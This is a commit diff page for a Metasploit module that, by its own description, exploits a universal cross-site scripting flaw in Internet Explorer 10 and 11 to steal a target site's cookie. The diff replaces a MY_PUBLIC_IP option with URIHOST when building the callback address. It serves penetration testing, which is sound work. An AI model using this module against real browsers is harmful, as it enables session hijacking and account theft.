Skip to content

Commit 17f2d80

Browse files
wchen-r7Tod Beardsley
authored andcommitted
Another update
1 parent 0125207 commit 17f2d80

File tree

1 file changed

+3
-8
lines changed

1 file changed

+3
-8
lines changed

modules/auxiliary/gather/ie_uxss_cookie.rb

Lines changed: 3 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -15,9 +15,7 @@ def initialize(info={})
1515
'Description' => %q{
1616
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
1717
Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
18-
datastore option). You will also most likely need to configure the MY_PUBLIC_IP
19-
datastore option in order receive the cookie. If you and the victim are actually in the
20-
same internal network, then you don't need to touch MY_PUBLIC_IP.
18+
datastore option). You will also most likely need to configure the URIHOST if you are behind NAT.
2119
},
2220
'License' => MSF_LICENSE,
2321
'Author' =>
@@ -38,8 +36,7 @@ def initialize(info={})
3836

3937
register_options(
4038
[
41-
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
42-
OptString.new('MY_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
39+
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ])
4340
], self.class)
4441
end
4542

@@ -64,12 +61,10 @@ def ninja_cookie_stealer_name
6461
end
6562

6663
def get_uri(cli=self.cli)
67-
ssl = !!(datastore["SSL"])
64+
ssl = datastore["SSL"]
6865
proto = (ssl ? "https://" : "http://")
6966
if datastore['URIHOST']
7067
host = datastore['URIHOST']
71-
elsif datastore['MY_PUBLIC_IP']
72-
host = datastore['MY_PUBLIC_IP']
7368
elsif (cli and cli.peerhost)
7469
host = Rex::Socket.source_address(cli.peerhost)
7570
else

0 commit comments

Comments
 (0)